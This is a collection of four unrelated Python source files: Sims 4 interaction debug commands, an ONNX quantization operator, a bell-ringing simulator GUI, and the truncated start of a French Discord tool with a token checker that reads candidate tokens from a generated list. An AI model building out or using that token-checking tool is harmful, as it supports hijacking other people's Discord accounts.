sims4.commands.output('Outcome for {} = {}'.format(si.affordance, si.global_outcome_result), _connection)
def send_reject_response(client, sim, context_handle, cancel_reason):
reject_msg = protocols.ServerResponseFailed()
reject_msg.handle = context_handle
reject_msg.reason = cancel_reason
distributor = Distributor.instance()
distributor.add_op_with_no_owner(GenericProtocolBufferOp(Operation.SIM_SERVER_RESPONSE_FAILED, reject_msg))
logger.debug(' sending reject msg')
def cancel_common(interaction_id: int, context_handle: int=None, _connection=None, user_canceled=False):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
interaction = sim.find_interaction_by_id(interaction_id)
if interaction is None:
continuation = sim.find_continuation_by_id(interaction_id)
if continuation is not None:
continuation.cancel_user(cancel_reason_msg='User canceled the interaction.')
return True
if interaction.cancel_user(cancel_reason_msg='Command interactions.cancel_si'):
return True
if context_handle is not None:
send_reject_response(client, sim, context_handle, protocols.ServerResponseFailed.REJECT_CLIENT_CANCEL_SUPERINTERACTION)
return False
@sims4.commands.Command('interactions.force_inertial', command_type=(sims4.commands.CommandType.Automation))
def interaction_force_inertial(opt_target: OptionalTargetParam=None, _connection=None):
sim = get_optional_target(opt_target, _connection)
if sim is None:
return False
for si in sim.si_state:
si.force_inertial = True
@sims4.commands.Command('interactions.cancel', command_type=(sims4.commands.CommandType.Live))
def cancel_mixer_interaction(interaction_id: int, mixer_id: int, server_ref: int, context_handle: int=None, _connection=None):
logger.debug('cancel_sub_interaction {0}', interaction_id)
client = services.client_manager().get(_connection)
sim = _active_sim(client)
interaction = sim.find_sub_interaction_by_aop_id(interaction_id, mixer_id)
if interaction is not None:
if sim.queue.running != interaction:
return interaction.cancel_user(cancel_reason_msg='Command interactions.cancel')
return False
@sims4.commands.Command('interactions.cancel_si', command_type=(sims4.commands.CommandType.Live))
def cancel_super_interaction(super_interaction_id: int, context_handle: int=None, _connection=None):
logger.debug('cancel_super_interaction {0}', super_interaction_id)
if False:
if _mixer_lock:
return False
return cancel_common(super_interaction_id, context_handle, _connection, user_canceled=True)
@sims4.commands.Command('interactions.run_first')
def first_interaction(target_id: int=None, _connection=None):
target = None
if target_id is not None:
target = services.object_manager().get(target_id)
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if target is None:
target = sim
context = client.create_interaction_context(sim)
affordances = list(target.potential_interactions(context))
if affordances:
logger.debug('Running affordance: {0}', affordances[0])
return affordances[0].test_and_execute(context)
return False
@sims4.commands.Command('interactions.push', command_type=(sims4.commands.CommandType.Live))
def push_interaction(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), opt_target: RequiredTargetParam=None, opt_sim: OptionalTargetParam=None, priority=Priority.High, _connection=None):
target = opt_target.get_target() if opt_target is not None else None
sim = get_optional_target(opt_sim, _connection)
client = services.client_manager().get(_connection)
priority = Priority(priority)
if not sim.queue.can_queue_visible_interaction():
sims4.commands.output('Interaction queue is full, cannot add anymore interactions.', _connection)
return False
context = InteractionContext(sim, (InteractionContext.SOURCE_PIE_MENU), priority, client=client, pick=None)
result = sim.push_super_affordance(affordance, target, context)
if not result:
output = sims4.commands.Output(_connection)
output('Failed to push: {}'.format(result))
return False
return True
@sims4.commands.Command('interactions.push_all_sims')
def push_interaction_on_all_sims(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), opt_target: RequiredTargetParam=None, _connection=None):
target = opt_target.get_target() if opt_target is not None else None
client = services.client_manager().get(_connection)
for sim_info in client.selectable_sims:
sim = sim_info.get_sim_instance()
if sim is not None:
context = InteractionContext(sim, (InteractionContext.SOURCE_PIE_MENU), (Priority.High), client=client, pick=None)
sim.push_super_affordance(affordance, target, context)
return True
@sims4.commands.Command('interactions.content_mode')
def set_content_mode(mode=None, _connection=None):
output = sims4.commands.Output(_connection)
if mode is None:
output('No mode specified. Please use one of: {}'.format(', '.join(ContentModes.names)))
return False
try:
valid_mode = ContentModes[mode.upper()]
except AttributeError:
output('Invalid mode specified. Please use one of: {}'.format(', '.join(ContentModes.names)))
return False
else:
services.config_service().content_mode = valid_mode
output('Mode set to {}'.format(valid_mode.name))
return True
@sims4.commands.Command('demo.mixer_lock')
def demo_mixer_lock(enabled=None, _connection=None):
output = sims4.commands.Output(_connection)
output('Mixer lock is not supported in optimized python builds.')
class InteractionModes(enum.Int, export=False):
default = 0
autonomous = 1
@sims4.commands.Command('interactions.set_interaction_mode')
def set_interaction_mode(mode: InteractionModes=None, source: int=None, priority: interactions.priority.Priority=None, _connection=None):
output = sims4.commands.Output(_connection)
client = services.client_manager().get(_connection)
if client is None:
return 0
sources = {}
for key, val in vars(interactions.context.InteractionContext).items():
if key.startswith('SOURCE'):
sources[val] = key
if mode is None:
if source is None:
if priority is None:
output('Source options:')
for val in sources.values():
output(' {}'.format(val))
output('Priority options:')
for val in interactions.priority.Priority:
output(' {}'.format(val.name))
elif mode is InteractionModes.default:
client.interaction_source = None
client.interaction_priority = None
else:
if mode is InteractionModes.autonomous:
client.interaction_source = interactions.context.InteractionContext.SOURCE_AUTONOMY
client.interaction_priority = interactions.priority.Priority.Low
if source is not None:
client.interaction_source = source
if priority is not None:
client.interaction_priority = priority
source = sources.get(client.interaction_source, client.interaction_source)
output('Client interaction mode: source={} priority={}'.format(source, client.interaction_priority.name))
return 1
@sims4.commands.Command('interactions.debug_outcome_print', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_print(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), mode=None, _connection=None):
sims4.commands.output(affordance.outcome.print_outcome_index(), _connection)
@sims4.commands.Command('interactions.debug_outcome_index_set', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_set(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), debug_outcome_index, mode=None, _connection=None):
interactions.utils.outcome.update_debug_outcome_index_mapping(affordance, debug_outcome_index)
sims4.commands.output(interactions.utils.outcome.debug_outcome_index_mapping.__str__(), _connection)
@sims4.commands.Command('interactions.debug_outcome_index_table_clear', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_table_clear(mode=None, _connection=None):
interactions.utils.outcome.debug_outcome_index_mapping = None
@sims4.commands.Command('interactions.debug_outcome_index_table_print', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_table_print(mode=None, _connection=None):
sims4.commands.output(interactions.utils.outcome.debug_outcome_index_mapping.__str__(), _connection)
@sims4.commands.Command('interactions.debug_outcome_style_set', command_type=(sims4.commands.CommandType.Automation))
def set_debug_outcome_style(debug_style, mode=None, _connection=None):
interactions.utils.outcome.debug_outcome_style = _parse_debug_outcome_style(debug_style)
@sims4.commands.Command('interactions.debug_outcome_style_current')
def print_current_debug_outcome_style(mode=None, _connection=None):
sims4.commands.output(interactions.utils.outcome.debug_outcome_style.__str__(), _connection)
@sims4.commands.Command('interactions.print_content_set')
def print_current_content_set(_connection=None):
client = services.client_manager().get(_connection)
if client is None:
return
sim = _active_sim(client)
if sim is None:
sims4.commands.output('There is no active sim.', _connection)
else:
has_printed = False
context = client.create_interaction_context(sim)
for si in sim.si_state:
potential_targets = si.get_potential_mixer_targets()
content_set = autonomy.content_sets.generate_content_set(sim, (si.super_affordance),
si,
context,
potential_targets=potential_targets)
for weight, aop, test_result in content_set:
affordance_name = aop.affordance.__name__ + ' '
sims4.commands.output('affordance:{} weight:{} result:{}'.format(affordance_name, weight, test_result), _connection)
has_printed = True
if not has_printed:
sims4.commands.output('Could not find an active content set.', _connection)
def _parse_debug_outcome_style(debug_outcome_style):
input_lower = debug_outcome_style.lower()
style = interactions.utils.outcome.DebugOutcomeStyle.NONE
if input_lower == 'auto_succeed' or input_lower == 'success':
style = interactions.utils.outcome.DebugOutcomeStyle.AUTO_SUCCEED
else:
if input_lower == 'auto_fail' or input_lower == 'fail':
style = interactions.utils.outcome.DebugOutcomeStyle.AUTO_FAIL
else:
if input_lower == 'rotate' or input_lower == 'alternate':
style = interactions.utils.outcome.DebugOutcomeStyle.ROTATE
else:
if input_lower == 'none' or input_lower == 'off':
style = interactions.utils.outcome.DebugOutcomeStyle.NONE
return style
@sims4.commands.Command('interactions.lock_content_set', command_type=(sims4.commands.CommandType.Automation))
def lock_content_set(*mixer_interactions, _connection=None):
try:
autonomy.content_sets.lock_content_sets(mixer_interactions)
except Exception as e:
try:
sims4.commands.output('Content set lock failed: {}'.format(e), _connection)
finally:
e = None
del e
@sims4.commands.Command('interactions.regenerate', command_type=(sims4.commands.CommandType.Automation))
def regenerate(_connection=None):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if sim is not None:
sims4.commands.output('Regenerate Content set currently disabled.', _connection)
@sims4.commands.Command('interactions.set_social_mixer_tests_enabled')
def toggle_social_tests(enabled: bool=None):
current = interactions.social.social_mixer_interaction.tunable_tests_enabled
if enabled is None:
interactions.social.social_mixer_interaction.tunable_tests_enabled = not current
else:
interactions.social.social_mixer_interaction.tunable_tests_enabled = enabled
@sims4.commands.Command('interactions.toggle_interactions_in_callstack', command_type=(sims4.commands.CommandType.Automation))
def toggle_interactions_in_callstack(enabled: bool=None, _connection=None):
value = postures.transition_sequence.inject_interaction_name_in_callstack
value = not value
postures.transition_sequence.inject_interaction_name_in_callstack = value
sims4.commands.output('Inject interaction names: {}'.format(value), _connection)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy
import onnx
from onnxruntime.quantization.quant_utils import QuantizedValueType, \
attribute_to_kwarg
from .base_operator import QuantOperatorBase
from lpot.adaptor.ox_utils.util import QuantizedValue
class QPad(QuantOperatorBase):
def __init__(self, onnx_quantizer, onnx_node):
super().__init__(onnx_quantizer, onnx_node)
def quantize(self):
node = self.node
assert (node.op_type == "Pad")
# Only after version 11, it has the optional constant_value
# If input[0] is not quantized, do not quanitize this node
if (self.quantizer.opset_version < 11) or (node.input[0] not \
in self.quantizer.quantized_value_map):
super().quantize()
return
quantized_input_value = self.quantizer.quantized_value_map[node.input[0]]
kwargs = {}
for attribute in node.attribute:
kv = attribute_to_kwarg(attribute)
kwargs.update(kv)
if 'mode' not in kwargs or kwargs['mode'] == b'constant':
if len(node.input) > 2: # There is 3rd input 'constant_value'
zp_tensor = self.quantizer.model.get_initializer(quantized_input_value.zp_name)
scale_tensor = \
self.quantizer.model.get_initializer(quantized_input_value.scale_name)
# if zp_tensor is None or scale_tensor is None:
# super().quantize()
# return
padding_constant_initializer = self.quantizer.model.get_initializer(node.input[2])
if padding_constant_initializer is not None:
zp_array = onnx.numpy_helper.to_array(zp_tensor)
zp_value = zp_array.item() if zp_array.ndim == 0 else zp_array[0]
scale_array = onnx.numpy_helper.to_array(scale_tensor)
scale_value = scale_array.item() if scale_array.ndim == 0 else scale_array[0]
padding_constant_array = \
onnx.numpy_helper.to_array(padding_constant_initializer)
quantized_padding_constant_array = quantize_nparray(
self.activation_dtype,
padding_constant_array, scale_value, zp_value)
quantized_padding_constant_name = node.input[2] + "_quantized"
quantized_padding_constant_initializer = onnx.numpy_helper.from_array(
quantized_padding_constant_array, quantized_padding_constant_name)
# Suppose this padding constant initializer only used by the node
self.quantizer.model.remove_initializer(padding_constant_initializer)
self.quantizer.model.add_initializer(quantized_padding_constant_initializer)
node.input[2] = quantized_padding_constant_name
else:
pad_value_qnodes = self.quantizer._get_quantize_input_nodes(node, 2,
self.activation_dtype)
self.quantizer.new_nodes += pad_value_qnodes
node.input[2] = pad_value_qnodes[0].output[0]
else:
# pad zero_point for original zero
node.input.extend([quantized_input_value.zp_name])
# Create an entry for output quantized value
quantized_output_value = QuantizedValue(node.output[0], node.output[0] + "_quantized",
quantized_input_value.scale_name,
quantized_input_value.zp_name,
QuantizedValueType.Input)
self.quantizer.quantized_value_map[node.output[0]] = quantized_output_value
node.name = node.name + "_quant" if node.name != "" else ""
node.input[0] = quantized_input_value.q_name
node.output[0] = quantized_output_value.q_name
self.quantizer.new_nodes += [node]
def quantize_nparray(qtype, arr, scale, zero_point, low=None, high=None):
dtype = numpy.uint8 if qtype == "uint8" else numpy.int8
cliplow = max(0 if dtype == numpy.uint8 else -127, -127 if low is None else low)
cliphigh = min(255 if dtype == numpy.uint8 else 127, 255 if high is None else high)
arr_fp32 = numpy.asarray((arr.astype(numpy.float32) / scale).round() + zero_point)
numpy.clip(arr_fp32, cliplow, cliphigh, out=arr_fp32)
return arr_fp32.astype(dtype)
|
from multiprocessing import Process, Pipe
import socket
from sys import byteorder
from Ringers import ringers
from Methods import methods, Method
from Strike import ring_bells
from Config import Config
from PIL import Image
from threading import Thread
from tkinter import *
from tkinter import ttk
import traceback
class PlayableExtent():
def __init__(self, method, extent_key):
self.method = method
self.extent_key = extent_key
def __str__(self):
return self.method.name + ' - ' + self.method.extent_name(self.extent_key)
def name(self):
return self.method.extent_name(self.extent_key)
def coverable(self):
return self.method.coverable()
def number_of_bells(self):
return self.method.number_of_bells()
def method_name(self):
return self.method.name
def extent_id(self):
return self.extent_key
def selected(self, event):
global selected_method, started, add_cover
selected_method = self
started = stop()
# If a Minor, Major, etc then no cover
if selected_method.coverable():
add_cover_checkbox['state'] = 'normal'
add_cover.set(True)
else:
add_cover_checkbox['state'] = 'disabled'
add_cover.set(False)
courses.set(1)
intros.set(1)
parent_ringer.send("ResetAll")
manage_bell_selection(selected_method.number_of_bells(), add_cover)
set_to_handstroke(bell_ropes)
progress.set(0)
def playable_extents(mcf_list):
methods = []
for mcf in mcf_list:
methods.append(Method('./data/' + mcf[1] + '.mcf'))
playable = []
for m in methods:
extent_id = 1
while m.extent_exists(extent_id):
playable.append(PlayableExtent(m, 'EXTENT-' + str(extent_id)))
extent_id += 1
return playable
def methods_treeview(parent, mcf_list):
tree = ttk.Treeview(parent, height = 5, show = 'tree')
for mcf in mcf_list:
method = Method('./data/' + mcf[1] + '.mcf')
branch = tree.insert('', 'end', mcf[1], text = method.name, values = (method,))
extent_id = 1
while method.extent_exists(extent_id):
extent = PlayableExtent(method, 'EXTENT-' + str(extent_id))
tree.insert(branch, 'end', extent, text = extent.name(), tags = (extent,))
tree.tag_bind(extent, '<<TreeviewSelect>>', extent.selected)
extent_id += 1
return tree
def manage_bell_selection(number_of_bells, add_cover):
for ndx in range(len(bell_selector_checkboxes)):
bell_selector_vars[ndx].set(False)
bell_selector_checkboxes[ndx]['state'] = 'normal'
bell_selector_checkboxes[ndx]['text'] = str(ndx + 1) + ' '
bell_controller(ndx + 1, bell_selector_vars[ndx])
bell_selector_checkboxes[0]['text'] = 'Treble'
nob = number_of_bells
if nob % 2 != 0 and add_cover.get() and nob < MAX_BELLS:
nob += 1
bell_selector_checkboxes[nob - 1]['text'] = 'Tenor '
for ndx in range(nob, len(bell_selector_checkboxes)):
bell_selector_checkboxes[ndx]['state'] = 'disabled'
def start():
parent_method.send("Start")
parent_ringer.send("Start")
return True
def stop():
parent_method.send("Stop")
parent_ringer.send("Stop")
return False
def bell_controller(bell_id, selected):
parent_method.send("Play," + str(bell_id) + "," + ("False" if selected.get() else "True"))
parent_ringer.send("ListenFor," + str(bell_id) + "," + ("True" if selected.get() else "False"))
def bell_indicators():
INDICATE_BELL_HANDSTROKE = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_bell') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_BACKSTROKE = INDICATE_BELL_HANDSTROKE + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_shift'))
INDICATE_BELL_GRAPHIC_CLEAR = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_graphic') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_GRAPHIC_SHOW = INDICATE_BELL_GRAPHIC_CLEAR + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_shift'))
INDICATE_BELL_NUMBER_SHIFT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_bell_number_shift')
hand = {}
back = {}
graphic_show = {}
graphic_clear = {}
for ndx in range(config.getint('BELLS', 'bells')):
hand[INDICATE_BELL_HANDSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
back[INDICATE_BELL_BACKSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
graphic_show[INDICATE_BELL_GRAPHIC_SHOW | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
graphic_clear[INDICATE_BELL_GRAPHIC_CLEAR | (ndx << INDICATE_BELL_NUMBER_SHIFT)] = ndx
return hand, back, graphic_show, graphic_clear
def set_to_handstroke(ropes):
for ndx in range(MAX_BELLS):
ropes[ndx]['image'] = sally_pic
def gui_events_listener(addr, port, window):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((addr, port))
EXIT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_exit')
handstroke_indicators, backstroke_indicators, graphic_show_indicators, graphic_clear_indicators = bell_indicators()
while True:
data, from_addr = sock.recvfrom(8)
command = int.from_bytes(data, byteorder)
if command in handstroke_indicators:
window.event_generate('<<BELL_HAND_STROKE_' + str(handstroke_indicators[command]) + '>>')
elif command in backstroke_indicators:
window.event_generate('<<BELL_BACK_STROKE_' + str(backstroke_indicators[command]) + '>>')
elif command in graphic_show_indicators:
window.event_generate('<<INDICATE_SHOW_' + str(graphic_show_indicators[command]) + '>>')
elif command in graphic_clear_indicators:
window.event_generate('<<INDICATE_CLEAR_' + str(graphic_clear_indicators[command]) + '>>')
elif command == EXIT:
break
def pace_change(value):
parent_method.send("Pace," + str(value))
def courses_change():
started = stop()
def intros_change():
started = stop()
def add_cover_change():
started = stop()
if selected_method:
manage_bell_selection(selected_method.number_of_bells(), add_cover)
set_to_handstroke(bell_ropes)
def gui_look_to():
global started
started = stop()
set_to_handstroke(bell_ropes)
progress_bar['maximum'] = selected_method.method.extent_size(selected_method.extent_id(), add_cover.get(), intros.get(), courses.get())
progress.set(0)
request = "Load," + selected_method.method_name() + "," + selected_method.extent_id() + ","
if not add_cover.get():
request = request + "no"
request = request + "cover," + str(intros.get()) + ',' + str(courses.get()) + ',' + str(wait_learner.get())
parent_method.send(request)
started = start()
def gui_stand():
started = stop()
set_to_handstroke(bell_ropes)
def gui_exit():
sock.sendto(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_exit').to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
window.destroy()
def bell_selected_callback(bell_id, selected):
s = selected
s.set(False)
b = bell_id + 1
return lambda : bell_controller(b, s)
def handstroke_callback(bell_id):
b = bell_id
return lambda event : show_handstroke(b)
def show_handstroke(bell_id):
if started and animated_ropes.get():
progress.set(progress.get() + 1)
bell_ropes[bell_id]['image'] = sally_pic
def backstroke_callback(bell_id):
b = bell_id
return lambda event : show_backstroke(b)
def show_backstroke(bell_id):
if started and animated_ropes.get():
progress.set(progress.get() + 1)
bell_ropes[bell_id]['image'] = tail_pic
def indicate_show_callback(bell_id):
b = bell_id
return lambda event : show_indicator(b)
def show_indicator(bell_id):
if started and bong_along.get():
bell_pull_indicators[bell_id]['image'] = indicator_bell_pic
def indicate_clear_callback(bell_id):
b = bell_id
return lambda event : clear_indicator(b)
def clear_indicator(bell_id):
if started and bong_along.get():
bell_pull_indicators[bell_id]['image'] = indicator_blank_pic
def center(window):
window.update_idletasks()
width = window.winfo_width()
frm_width = window.winfo_rootx() - window.winfo_x()
win_width = width + 2 * frm_width
height = window.winfo_height()
titlebar_height = window.winfo_rooty() - window.winfo_y()
win_height = height + titlebar_height + frm_width # seems strange to use width in height calculation
x = window.winfo_screenwidth() // 2 - win_width // 2
y = window.winfo_screenheight() // 2 - win_height // 2
window.geometry('{}x{}+{}+{}'.format(width, height, x, y))
window.deiconify()
if __name__ == '__main__':
config = Config('ensemble.ini')
MAX_BELLS = config.getint('BELLS', 'bells')
parent_method, child_method = Pipe()
parent_ringer, child_ringer = Pipe()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ringer = Process(target = ringers, args = (child_ringer, parent_method, config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
ringer.start()
method = Process(target = methods, args = (child_method, config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
method.start()
bells = Process(target = ring_bells, args = (config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
bells.start()
started = False
window = Tk()
style = ttk.Style()
style.theme_use('alt')
window.title('Ringable Ensemble')
window.columnconfigure(0, weight = 1)
window.rowconfigure(0, weight = 1)
window.protocol("WM_DELETE_WINDOW", gui_exit)
add_cover = BooleanVar(window)
add_cover.set(True)
bong_along = BooleanVar(window)
bong_along.set(True)
wait_learner = BooleanVar(window)
wait_learner.set(False)
animated_ropes = BooleanVar(window)
animated_ropes.set(True)
courses = IntVar(window)
courses.set(1)
intros = IntVar(window)
intros.set(1)
main_frame = ttk.Frame(window, relief = 'raised', borderwidth = 2)
main_frame.grid(column = 0, row = 0, sticky = NSEW)
main_frame.columnconfigure(0, weight = 1)
for ndx in range(5):
main_frame.rowconfigure(ndx, weight = 1)
method_frame = ttk.LabelFrame(main_frame, text = 'Select Method')
method_frame.grid(column = 0, row = 0, padx = 10, pady = 10, sticky = NSEW)
method_frame.columnconfigure(0, weight = 1)
method_frame.rowconfigure(0, weight = 1)
methods = methods_treeview(method_frame, config.items('MCF'))
methods.grid(column = 0, row = 1, sticky = NSEW)
methods_scroll_bar = ttk.Scrollbar(method_frame, orient = 'vertical', command = methods.yview)
# methods_scroll_bar = Scrollbar(method_frame, orient = 'vertical', command = methods.yview)
methods_scroll_bar.grid(column = 1, row = 1, sticky = (N, S, W))
methods['yscrollcommand'] = methods_scroll_bar.set
checkboxes_frame = ttk.Frame(main_frame)
checkboxes_frame.grid(column = 0, row = 1, padx = 10, pady = 10, sticky = NSEW)
for col in range(4):
checkboxes_frame.columnconfigure(col, weight = 1)
checkboxes_frame.rowconfigure(0, weight = 1)
add_cover_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Add cover bell', variable = add_cover, command = add_cover_change)
add_cover_checkbox.grid(column = 0, row = 0, padx = 3, pady = 3)
bong_along_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Bong-along', variable = bong_along)
bong_along_checkbox.grid(column = 1, row = 0, padx = 3, pady = 3)
wait_learner_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Wait for ringer', variable = wait_learner)
wait_learner_checkbox.grid(column = 2, row = 0, padx = 3, pady = 3)
animated_ropes_checkbox = ttk.Checkbutton(checkboxes_frame, text = 'Animated ropes', variable = animated_ropes)
animated_ropes_checkbox.grid(column = 3, row = 0, padx = 3, pady = 3)
method_control_frame = ttk.Frame(main_frame)#, borderwidth = 5, relief = RAISED)
method_control_frame.grid(column = 0, row = 2, padx = 10, pady = 10, sticky = NSEW)
for col in range(3):
method_control_frame.columnconfigure(col, weight = 1)
method_control_frame.rowconfigure(0, weight = 1)
pace_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
pace_frame.grid(column = 0, row = 0, padx = 3)#, sticky = EW)
ttk.Label(pace_frame, text = 'Set pace of rounds').grid(column = 0, row = 0, padx = 3, pady = 3)
pace_scale = Scale(pace_frame, from_ = 2.0, to = 5.0, orient = HORIZONTAL, resolution = 0.1, length = 200, tickinterval = 1.0, command = pace_change)
pace_scale.set(3.0)
pace_scale.grid(column = 1, row = 0, padx = 3, pady = 3)
courses_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
courses_frame.grid(column = 1, row = 0, padx = 3)#, sticky = EW)
ttk.Label(courses_frame, text = 'Courses').grid(column = 2, row = 0, padx = 3, pady = 3)
courses_spin = Spinbox(courses_frame, from_ = 1, to = 4, command = courses_change, state = 'readonly', textvariable = courses, width = 2, justify = CENTER)
courses_spin.grid(column = 3, row = 0, padx = 3, pady = 3)
intros_frame = ttk.Frame(method_control_frame)#, borderwidth = 5, relief = RAISED)
intros_frame.grid(column = 2, row = 0, padx = 3)#, sticky = EW)
ttk.Label(intros_frame, text = 'Intro rounds').grid(column = 4, row = 0, padx = 3, pady = 3)
intros_spin = Spinbox(intros_frame, from_ = 1, to = 4, command = intros_change, state = 'readonly', textvariable = intros, width = 2, justify = CENTER)
intros_spin.grid(column = 5, row = 0, padx = 3, pady = 3)
bell_rope_frame = ttk.LabelFrame(main_frame, text = 'Select Bells to be controlled by buttons')
bell_rope_frame.grid(column = 0, row = 3, padx = 10, pady = 10, sticky = NSEW)
bell_rope_frame.rowconfigure(0, weight = 1)
bell_pull_indicators = []
bell_ropes = []
bell_selector_vars = []
bell_selector_checkboxes = []
indicator_blank_pic = PhotoImage(file = './data/IndicatorBlank.png')
indicator_bell_pic = PhotoImage(file = './data/IndicatorBell.png')
sally_pic = PhotoImage(file = './data/SmallSally.png')
tail_pic = PhotoImage(file = './data/SmallTail.png')
for ndx in range(MAX_BELLS):
bell_rope_frame.columnconfigure(ndx, weight = 1)
indicator = Label(bell_rope_frame, image = indicator_blank_pic, width = indicator_blank_pic.width(), height = indicator_blank_pic.height())
indicator.grid(column = ndx, row = 0, padx = 3, pady = 3, sticky = EW)
bell_pull_indicators.append(indicator)
window.bind('<<INDICATE_SHOW_' + str(ndx) + '>>', func = indicate_show_callback(ndx))
window.bind('<<INDICATE_CLEAR_' + str(ndx) + '>>', func = indicate_clear_callback(ndx))
rope = Label(bell_rope_frame, image = sally_pic, width = sally_pic.width(), height = sally_pic.height())
rope.grid(column = ndx, row = 1, padx = 50, pady = 3, sticky = EW)
bell_ropes.append(rope)
window.bind('<<BELL_HAND_STROKE_' + str(ndx) + '>>', func = handstroke_callback(ndx))
window.bind('<<BELL_BACK_STROKE_' + str(ndx) + '>>', func = backstroke_callback(ndx))
bell_selector_vars.append(BooleanVar(bell_rope_frame))
check = ttk.Checkbutton(bell_rope_frame, text = str(ndx + 1) + ' ', variable = bell_selector_vars[ndx], command = bell_selected_callback(ndx, bell_selector_vars[ndx]))
check.grid(column = ndx, row = 2, padx = 3, pady = 3)#, sticky = EW)
bell_selector_checkboxes.append(check)
progress_frame = ttk.Frame(main_frame)
progress_frame.grid(column = 0, row = 4, padx = 10, pady = 10, sticky = NSEW)
progress_frame.columnconfigure(0, weight = 1)
progress_frame.rowconfigure(0, weight = 1)
progress = IntVar(window)
progress_bar = ttk.Progressbar(progress_frame, length = 100, mode = 'determinate', orient = HORIZONTAL, variable = progress)
progress_bar.grid(column = 0, row = 0, padx = 10, pady = 10, sticky = EW)
button_frame = ttk.Frame(main_frame, relief = RAISED, borderwidth = 2)
button_frame.grid(column = 0, row = 5, padx = 10, pady = 10, sticky = NSEW)
button_frame.columnconfigure(0, weight = 0)
button_frame.columnconfigure(1, weight = 1)
button_frame.columnconfigure(2, weight = 0)
button_frame.rowconfigure(0, weight = 1)
look_to_button = ttk.Button(button_frame, text = 'Look To', command = gui_look_to)
look_to_button.grid(column = 0, row = 0, padx = 3, pady = 3, sticky = W)
stand_button = ttk.Button(button_frame, text = 'Stand', command = gui_stand)
stand_button.grid(column = 1, row = 0, padx = 3, pady = 3, sticky = W)
exit_button = ttk.Button(button_frame, text = 'Exit', command = gui_exit)
exit_button.grid(column = 2, row = 0, padx = 3, pady = 3, sticky = E)
gui_events = Thread(target = gui_events_listener, args = (config.get('GUI_EVENT_LISTENER', 'addr'), config.getint('GUI_EVENT_LISTENER', 'port'), window))
gui_events.start()
center(window)
window.mainloop()
gui_events.join()
parent_method.send("Exit")
method.join()
parent_ringer.send("Exit")
ringer.join()
sock.sendto(config.getint('STRIKE_COMMANDS', 'exit').to_bytes(1, byteorder), (config.get('STRIKE', 'addr'), config.getint('STRIKE', 'port')))
bells.join()
|
from colorama import init, Fore
init()
import requests
import os
from os import system
import time
import socket
import random
import urllib.request , socket
import discord
import threading
def clear():
system("cls")
system("mode 110, 34")
os.system("title STRANGER - DEV PAR AZULAX")
def TOKEN_CHECKER():
clear()
print(Fore.LIGHTBLACK_EX+"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
""")
print("oublie pas de mettre les tokens a verif dans le txt x))")
time.sleep(3)
with open("gen/token_gen.txt") as f:
for line in f:
token = line.strip("\n")
